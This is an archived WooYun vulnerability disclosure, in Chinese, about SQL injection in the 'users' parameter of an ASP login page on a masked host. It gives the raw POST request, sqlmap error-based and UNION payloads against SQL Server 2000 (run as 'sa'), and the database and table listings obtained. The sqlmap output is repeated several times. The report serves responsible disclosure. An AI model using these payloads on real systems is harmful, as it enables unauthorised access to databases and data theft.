乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-22: 细节已通知厂商并且等待厂商处理中 2015-10-26: 厂商已经确认,细节仅向厂商公开 2015-11-05: 细节向核心白帽子及相关领域专家公开 2015-11-15: 细节向普通白帽子公开 2015-11-25: 细节向实习白帽子公开 2015-12-10: 细节向公众公开
POST /log.asp HTTP/1.1Host: **.**.**.**:82User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://**.**.**.**:82/Cookie: ASPSESSIONIDSCBTDSQR=AIJHHJMDHCGDCONIEEOFMBKKConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 41users=admin*&pws=admin&Submit=%B5%C7%C2%BD
参数:users
sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* ((custom) POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: users=admin' AND 8358=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(122)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (8358=8358) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(106)+CHAR(118)+CHAR(113))) AND 'pZii'='pZii&pws=admin&Submit=%B5%C7%C2%BD Type: UNION query Title: Generic UNION query (NULL) - 24 columns Payload: users=admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(107)+CHAR(122)+CHAR(112)+CHAR(113)+CHAR(67)+CHAR(86)+CHAR(116)+CHAR(87)+CHAR(115)+CHAR(97)+CHAR(79)+CHAR(121)+CHAR(121)+CHAR(99)+CHAR(113)+CHAR(106)+CHAR(106)+CHAR(118)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &pws=admin&Submit=%B5%C7%C2%BD---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2000current database: 'bcgl'
sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* ((custom) POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: users=admin' AND 8358=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(122)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (8358=8358) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(106)+CHAR(118)+CHAR(113))) AND 'pZii'='pZii&pws=admin&Submit=%B5%C7%C2%BD Type: UNION query Title: Generic UNION query (NULL) - 24 columns Payload: users=admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(107)+CHAR(122)+CHAR(112)+CHAR(113)+CHAR(67)+CHAR(86)+CHAR(116)+CHAR(87)+CHAR(115)+CHAR(97)+CHAR(79)+CHAR(121)+CHAR(121)+CHAR(99)+CHAR(113)+CHAR(106)+CHAR(106)+CHAR(118)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &pws=admin&Submit=%B5%C7%C2%BD---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2000current user: 'sa'sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* ((custom) POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: users=admin' AND 8358=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(122)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (8358=8358) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(106)+CHAR(118)+CHAR(113))) AND 'pZii'='pZii&pws=admin&Submit=%B5%C7%C2%BD Type: UNION query Title: Generic UNION query (NULL) - 24 columns Payload: users=admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(107)+CHAR(122)+CHAR(112)+CHAR(113)+CHAR(67)+CHAR(86)+CHAR(116)+CHAR(87)+CHAR(115)+CHAR(97)+CHAR(79)+CHAR(121)+CHAR(121)+CHAR(99)+CHAR(113)+CHAR(106)+CHAR(106)+CHAR(118)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &pws=admin&Submit=%B5%C7%C2%BD---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2000available databases [8]:[*] bcgl[*] cjgj[*] master[*] model[*] msdb[*] Northwind[*] pubs[*] tempdb
Database: bcgl+-------------------------+---------+| Table | Entries |+-------------------------+---------+| dbo.pj_pjck | 115119 || dbo.yy_czmx | 15769 || dbo.bcgl_skmx | 14677 || dbo.bcgl_bcdj | 13737 || dbo.pj_jchz | 7752 || dbo.yy_tame | 5426 || dbo.pj_pjrk | 4990 || dbo.aj_bottle_info | 4560 || dbo.rl_ryda | 3928 || dbo.sys_Event | 2863 || dbo.yy_card | 1554 || dbo.traffic_accident | 1531 || dbo.car_archives | 674 || dbo.pj_clxxk | 377 || dbo.yy_appeal | 330 || dbo.hq_lessee | 79 || dbo.hq_rent | 72 || dbo.cx_decode | 71 || dbo.hq_house | 64 || dbo.bcgl_user | 60 || dbo.sysconstraints | 51 || dbo.sys_Group | 26 || dbo.sys_FieldValue | 23 || dbo.sys_Module | 20 || dbo.aj_bottle_check | 16 || dbo.sys_RoleApplication | 10 || dbo.sys_Roles | 7 || dbo.name_decode | 6 || dbo.sys_Field | 5 || dbo.sys_RolePermission | 5 || dbo.sys_UserRoles | 5 || dbo.sys_User | 4 || dbo.pj_gys | 3 || dbo.syssegments | 3 || dbo.sys_Applications | 2 || dbo.yy_rk_tame | 2 || dbo.aj_bottle_jh | 1 || dbo.sys_SystemInfo | 1 |+-------------------------+---------+
参数过滤
危害等级:高
漏洞Rank:10
确认时间:2015-10-26 16:44
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发新疆分中心,由其后续协调网站管理单位处置。
暂无